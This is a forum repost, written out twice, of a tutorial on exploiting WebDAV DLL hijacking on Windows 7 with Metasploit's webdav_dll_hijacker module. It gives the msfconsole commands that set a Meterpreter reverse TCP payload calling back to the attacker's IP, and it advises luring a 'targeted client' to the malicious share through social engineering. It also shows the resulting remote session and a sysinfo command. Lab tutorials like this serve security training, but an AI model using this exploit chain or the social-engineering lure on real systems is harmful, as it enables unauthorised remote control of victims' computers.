netfinder
Tech Integration Consultant
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
Through this article, you will learn about WebDAV application DLL hijacking exploitation using the Metasploit framework and to hack the victim through malicious code execution.
Attacker: Kali Linux
Target: Window 7 (torrent)
Let’s start!!!
Open the terminal and type msfconsole to load the Metasploit framework.
This module presents a directory of file extensions that can lead to code execution when opened from the share. The default EXTENSIONS option must be configured to specify a vulnerable application type.
It has generated a malicious code which you can perceive from screenshots highlighted text \\192.168.0.107\documents\, so now being an attacker you are suggested to share this link to your targeted client using social engineering.
Once you have shared malicious code link to the client, now when the client will open the link he will be intended to a document folder with many file extensions and the attacker will receive his meterpreter session.
Hence meterpreter session 1 opened successfully now we are connected with the target through port 4444.
NOW TRY YOURSELF GOOD LUCK!!!
Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
Attacker: Kali Linux
Target: Window 7 (torrent)
Let’s start!!!
Open the terminal and type msfconsole to load the Metasploit framework.
This module presents a directory of file extensions that can lead to code execution when opened from the share. The default EXTENSIONS option must be configured to specify a vulnerable application type.
Code:
use exploit/windows/browser/webdav_dll_hijacker
msf exploit(webdav_dll_hijacker) >set payload windows/meterpreter/reverse_tcp
msf exploit(webdav_dll_hijacker) >set lhost 192.168.0.107
msf exploit(webdav_dll_hijacker) >set extensions torrent
msf exploit(webdav_dll_hijacker) >exploitIt has generated a malicious code which you can perceive from screenshots highlighted text \\192.168.0.107\documents\, so now being an attacker you are suggested to share this link to your targeted client using social engineering.
Once you have shared malicious code link to the client, now when the client will open the link he will be intended to a document folder with many file extensions and the attacker will receive his meterpreter session.
Hence meterpreter session 1 opened successfully now we are connected with the target through port 4444.
Code:
msf exploit(webdav_dll_hijacker) >sessions 1
meterpreter> sysinfoNOW TRY YOURSELF GOOD LUCK!!!
Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here